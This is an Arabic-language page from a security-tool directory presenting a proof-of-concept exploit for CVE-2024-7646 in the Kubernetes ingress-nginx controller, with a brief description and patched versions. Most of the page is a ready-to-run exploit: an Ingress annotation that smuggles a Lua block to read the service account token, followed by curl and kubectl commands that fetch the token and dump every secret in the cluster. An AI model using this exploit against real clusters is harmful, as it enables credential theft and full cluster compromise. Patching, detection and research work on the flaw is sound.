Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/dovics/cve-2024-7646
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن الويبأمن السحابةسوء التكوين
GitHubdovics/cve-2024-7646

cve-2024-7646

إثبات المفهوم CVE-2024-7646

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-7646

الوصف

بشكل افتراضي، nginx.ingress.kubernetes.io/server-snippet معطل، ولكن بسبب هذه الثغرة (CVE)، يمكن لـ nginx.ingress.kubernetes.io/auth-tls-verify-client إدراج مقتطفات مخصصة، أو حتى تضمين كود Lua.

الإصدار المُصحَّح

وحدة تحكم ingress-nginx v1.11.2 - تم إصلاحها بواسطة kubernetes/ingress-nginx#11719 و kubernetes/ingress-nginx#11721 وحدة تحكم ingress-nginx v1.10.4 - تم إصلاحها بواسطة kubernetes/ingress-nginx#11718 و kubernetes/ingress-nginx#11722

إثبات المفهوم (PoC)

يتطلب صلاحية إنشاء Ingress

root@kitploit:~
openssl genrsa -out ca.key 2048
openssl req -new -x509 -key ca.key -out ca.crt -days 365 -subj "/CN=ca"
kubectl create secret generic ca-secret --from-file=ca.crt=ca.crt
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: cve-ingress
  namespace: default
  annotations:
    nginx.ingress.kubernetes.io/auth-tls-secret: default/ca-secret
    nginx.ingress.kubernetes.io/auth-tls-verify-client: "off;\r\nlocation /token{\r\ncontent_by_lua_block{\r\nfile = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token','r')\r\nngx.say(file:read('*a'))\r\nngx.exit(ngx.HTTP_OK)\r\n}\r\n}\r\nset \$test true"
spec:
  rules:
    - host: test.ingress.io
      http:
        paths:
          - pathType: Prefix
            path: /test
            backend:
              service:
                name: test-service
                port:
                  number: 8080
EOF

في التكوين الافتراضي، يكون لتلك الشهادة صلاحية الوصول إلى جميع الأسرار في المجموعة.

root@kitploit:~
TOKEN=$(curl 127.0.0.1:8080/token  -H "Host: test.ingress.io")
kubectl --token=$TOKEN get secret -A -o yaml
تنزيل الأداة